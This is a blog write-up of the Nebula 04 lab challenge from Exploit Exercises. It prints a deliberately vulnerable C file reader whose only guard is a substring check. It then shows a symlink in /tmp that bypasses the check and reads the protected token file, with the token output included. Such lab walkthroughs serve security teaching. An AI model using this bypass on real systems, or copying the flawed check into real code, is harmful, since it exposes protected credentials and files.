MattAndreko.com

"hostess is a code-slaying dragon found deep within the core of the earth, unearthing magma and vulnerabilities single handedly while using the other hand to pet his cat"

Exploit Exercises - Nebula 04

| Comments

I really like Nebula 04, because it is really easy, but still a commonly missed thing in programming.

The object of this challenge is to find a vulnerability and exploit this C++ program.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>
#include <fcntl.h>

int main(int argc, char **argv, char **envp)
{
 char buf[1024];
 int fd, rc;

 if(argc == 1) {
  printf("%s [file to read]\n", argv[0]);
  exit(EXIT_FAILURE);
 }

 if(strstr(argv[1], "token") != NULL) {
  printf("You may not access '%s'\n", argv[1]);
  exit(EXIT_FAILURE);
 }

 fd = open(argv[1], O_RDONLY);
 if(fd == -1) {
  err(EXIT_FAILURE, "Unable to open %s", argv[1]);
 }

 rc = read(fd, buf, sizeof(buf));

 if(rc == -1) {
  err(EXIT_FAILURE, "Unable to read fd %d", fd);
 }

 write(1, buf, rc);
}

So this program first verifies that you did pass it an argument of some sort. If you pass that check, it then makes sure that your argument does not contain the term “token”, since the developer knows the filename they want to protect. If both of those suceed, it tries to open the file, and print it to the screen, as long as it exists, and has no general read errors.

So to exploit this program, we need to pass the program an argument, and it needs to not contain the term “token” in it. So all we need to do is make a symbolic link.

1
2
3
level04@nebula:/home/flag04$ ln -s /home/flag04/token /tmp/level04
level04@nebula:/home/flag04$ ./flag04 /tmp/level04
06508b5e-8909-4f38-b630-fdb148a848a2

The only odd part about this challenge is that there’s apparently no privilege escalation done, so you can run “getflag”, like every other problem up until now. Someone else noticed the same thing, but there has been no answer. So as far as I’m concerned, this challenge is complete. We got the contents of the token file.

Comments